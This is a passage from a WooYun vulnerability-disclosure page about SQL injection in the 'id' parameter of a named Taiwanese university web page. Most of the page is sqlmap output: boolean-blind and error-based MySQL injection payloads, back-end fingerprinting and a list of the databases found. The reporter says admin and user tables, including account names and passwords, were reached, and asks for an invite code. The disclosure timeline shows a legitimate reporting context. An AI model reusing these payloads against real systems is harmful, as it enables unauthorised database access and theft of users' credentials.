乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-20: 细节已通知厂商并且等待厂商处理中 2015-05-23: 厂商已经确认,细节仅向厂商公开 2015-06-02: 细节向核心白帽子及相关领域专家公开 2015-06-12: 细节向普通白帽子公开 2015-06-22: 细节向实习白帽子公开 2015-07-07: 细节向公众公开
求一枚邀请吗。。
https://donkey.cc.ncu.edu.tw/~training/bin/class.php?id=18
在register数据库里只跑了admin表,其他的皆为用户表,帐号密码都有。平时:来个邀请码咯
Place: GETParameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: id=18" RLIKE (SELECT (CASE WHEN (8771=8771) THEN 18 ELSE 0x28 END)) AND "LZgd"="LZgd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=18" AND (SELECT 1551 FROM(SELECT COUNT(*),CONCAT(0x71636a6371,(SELECT (CASE WHEN (1551=1551) THEN 1 ELSE 0 END)),0x7170696f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "UPSi"="UPSi---[22:58:09] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0[22:58:09] [INFO] fetching database names[22:58:09] [INFO] the SQL query used returns 3 entries[22:58:09] [INFO] resumed: information_schema[22:58:09] [INFO] resumed: register[22:58:09] [INFO] resumed: testavailable databases [3]:[*] information_schema[*] register[*] test[22:58:09] [INFO] fetched data logged to text files under '/root/Desktop/sqlmap/output/donkey.cc.ncu.edu.tw'
危害等级:高
漏洞Rank:15
确认时间:2015-05-23 01:37
感謝通報邀请吗?
暂无